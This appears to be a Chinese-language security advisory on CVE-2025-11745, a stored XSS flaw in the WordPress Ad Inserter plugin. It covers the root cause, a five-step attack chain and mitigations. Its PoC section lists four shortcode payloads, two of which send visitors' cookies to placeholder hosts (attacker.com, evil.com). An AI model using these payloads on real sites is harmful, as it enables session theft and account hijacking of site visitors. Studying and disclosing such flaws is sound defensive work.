CVE-2025-11745 WordPress Ad Inserter插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11745

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Ad Inserter – Ad Manager & AdSense Ads插件

漏洞概述

CVE-2025-11745是WordPress Ad Inserter插件中的一个存储型跨站脚本（Stored XSS）漏洞。该插件是WordPress平台上广泛使用的广告管理和插入工具，用于在网站页面中插入Google AdSense和其他广告代码。漏洞源于插件的'adinserter'短代码在处理用户提供的属性时，未能正确进行输入清理和输出转义。攻击者可以利用custom field功能，通过adinserter短代码注入恶意JavaScript脚本。由于是存储型XSS，恶意脚本会被永久保存在数据库中，所有访问包含该短代码页面的用户都会执行攻击者植入的脚本。攻击者可以利用此漏洞窃取用户会话cookie、劫持用户账户或进行钓鱼攻击。漏洞影响所有版本至2.8.7版本，需要拥有contributor级别权限的认证用户即可利用此漏洞。

技术细节

漏洞根源在于adinserter短代码处理用户输入时缺乏安全防护。攻击者作为contributor或更高权限用户，可在WordPress的custom field中插入包含恶意JavaScript代码的adinserter短代码属性。插件在渲染页面时，直接将未经过滤的用户输入输出到HTML中，导致恶意脚本被执行。具体攻击流程如下：攻击者创建或编辑文章/页面，在custom field中添加包含XSS payload的adinserter短代码参数（如[adinserter name='test' data='"><script>alert(document.cookie)</script>']），保存后插件在页面输出时未对属性值进行HTML实体转义，恶意脚本被浏览器解析执行。由于短代码属性通过custom field传递，攻击者可以绕过WordPress编辑器的内容过滤机制，直接注入有效载荷。此漏洞影响插件的所有核心功能，包括广告插入、代码管理和页面优化模块。

攻击链分析

STEP 1

步骤1：侦察与权限获取

攻击者获取WordPress网站的Contributor或更高权限账户，可通过弱口令、社会工程或利用其他漏洞获取凭据

STEP 2

步骤2：构造恶意短代码

攻击者在文章/页面的custom field中构造包含XSS payload的adinserter短代码，利用未过滤的属性参数注入恶意JavaScript代码

STEP 3

步骤3：保存并持久化

攻击者保存文章/页面，恶意脚本随post meta数据永久存储在数据库中，成为存储型XSS攻击向量

STEP 4

步骤4：触发执行

受害者访问包含恶意短代码的页面时，浏览器解析页面HTML，插件输出未转义的用户输入，恶意脚本在受害者浏览器中执行

STEP 5

步骤5：窃取敏感信息

恶意脚本可窃取用户会话cookie、劫持账户、修改页面内容或进行进一步横向移动攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- WordPress Ad Inserter XSS PoC - CVE-2025-11745 -->
<!--
Usage:
1. Login as Contributor or higher role
2. Edit/Create a post or page
3. Add custom field with name containing XSS payload
4. Save and view the page
-->

<!-- Method 1: Via Custom Field -->
[adinserter name='test' data='"><script>alert('XSS by CVE-2025-11745')</script>']

<!-- Method 2: Alternative payload -->
[adinserter name='"><img src=x onerror=alert(document.domain)>']

<!-- Method 3: Cookie stealing payload -->
[adinserter name='test' data='"><script>fetch("https://attacker.com/steal?c="+document.cookie)</script>']

<!-- Method 4: Session hijacking -->
[adinserter name='"><script>document.location='https://evil.com/log?cookie='+encodeURIComponent(document.cookie)</script>']

影响范围

WordPress Ad Inserter插件 <= 2.8.7（所有版本）

防御指南

临时缓解措施

临时缓解措施包括：1）升级Ad Inserter插件到2.8.8或更高版本；2）如果无法立即升级，可临时禁用adinserter短代码功能或限制低权限用户创建/编辑内容；3）使用WordPress安全插件监控异常短代码使用行为；4）实施严格的访问控制，确保只有可信用户拥有Contributor及以上权限；5）考虑临时移除对adinserter短代码的信任，直到官方补丁发布。